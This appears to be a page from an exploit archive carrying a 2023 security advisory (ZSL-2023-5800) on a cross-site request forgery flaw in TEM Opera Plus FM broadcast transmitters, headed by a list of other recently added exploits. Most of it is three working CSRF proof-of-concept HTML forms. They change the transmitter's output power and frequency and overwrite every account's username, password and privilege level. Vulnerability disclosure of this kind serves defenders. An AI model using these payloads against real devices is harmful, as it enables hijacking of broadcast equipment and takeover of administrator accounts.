c1bcfc6347
13 changes to exploits/shellcodes/ghdb TEM Opera Plus FM Family Transmitter 35.45 - Remote Code Execution TEM Opera Plus FM Family Transmitter 35.45 - XSRF Executables Created with perl2exe < V30.10C - Arbitrary Code Execution Atlassian Confluence Data Center and Server - Authentication Bypass (Metasploit) Automatic-Systems SOC FL9600 FastLine - Directory Transversal Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin dawa-pharma 1.0-2022 - Multiple-SQLi Moodle 4.3 - Insecure Direct Object Reference Moodle 4.3 - Reflected XSS SuperStoreFinder - Multiple Vulnerabilities Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) and Remote Code Execution (RCE) Zoo Management System 1.0 - Unauthenticated RCE
92 lines
No EOL
3 KiB
Text
92 lines
No EOL
3 KiB
Text
<!--
|
|
|
|
TEM Opera Plus FM Family Transmitter 35.45 XSRF
|
|
|
|
|
|
Vendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.
|
|
Product web page: https://www.tem-italy.it
|
|
Affected version: Software version: 35.45
|
|
Webserver version: 1.7
|
|
|
|
Summary: This new line of Opera plus FM Transmitters combines very
|
|
high efficiency, high reliability and low energy consumption in compact
|
|
solutions. They have innovative functions and features that can eliminate
|
|
the costs required by additional equipment: automatic exchange of audio
|
|
sources, built-in stereo encoder, integrated RDS encoder, parallel I/O
|
|
card, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTP
|
|
Webserver.
|
|
|
|
Desc: The application interface allows users to perform certain actions
|
|
via HTTP requests without performing any validity checks to verify the
|
|
requests. This can be exploited to perform certain actions with administrative
|
|
privileges if a logged-in user visits a malicious web site.
|
|
|
|
Tested on: Webserver
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2023-5800
|
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5800.php
|
|
|
|
|
|
18.08.2023
|
|
|
|
-->
|
|
|
|
|
|
CSRF Change Forward Power:
|
|
-------------------------
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
|
|
<input type="hidden" name="Pwr" value="00100" />
|
|
<input type="submit" value="Change" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
CSRF Change Frequency:
|
|
---------------------
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.2:8000/user/postcmd.htm" method="POST" enctype="text/plain">
|
|
<input type="hidden" name="Freq" value="95.5" />
|
|
<input type="submit" value="Change" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
CSRF Change User/Pass/Priv Change Admin/User/Pass:
|
|
-------------------------------------------------
|
|
|
|
<html>
|
|
<body>
|
|
<form action="http://192.168.1.2:8000/protect/accounts.htm" method="POST">
|
|
<input type="hidden" name="usr0" value="admin" />
|
|
<input type="hidden" name="psw0" value="admin" />
|
|
<input type="hidden" name="usr1" value="operator1" />
|
|
<input type="hidden" name="psw1" value="operator1" />
|
|
<input type="hidden" name="lev1" value="1" />
|
|
<input type="hidden" name="usr2" value="operator2" />
|
|
<input type="hidden" name="psw2" value="operator2" />
|
|
<input type="hidden" name="lev2" value="1" />
|
|
<input type="hidden" name="usr3" value="consulter1" />
|
|
<input type="hidden" name="psw3" value="consulter1" />
|
|
<input type="hidden" name="lev3" value="2" />
|
|
<input type="hidden" name="usr4" value="consulter2" />
|
|
<input type="hidden" name="psw4" value="consulter2" />
|
|
<input type="hidden" name="lev4" value="2" />
|
|
<input type="hidden" name="usr5" value="consulter3" />
|
|
<input type="hidden" name="psw5" value="consulter3" />
|
|
<input type="hidden" name="lev5" value="2" />
|
|
<input type="submit" value="Change" />
|
|
</form>
|
|
</body>
|
|
</html> |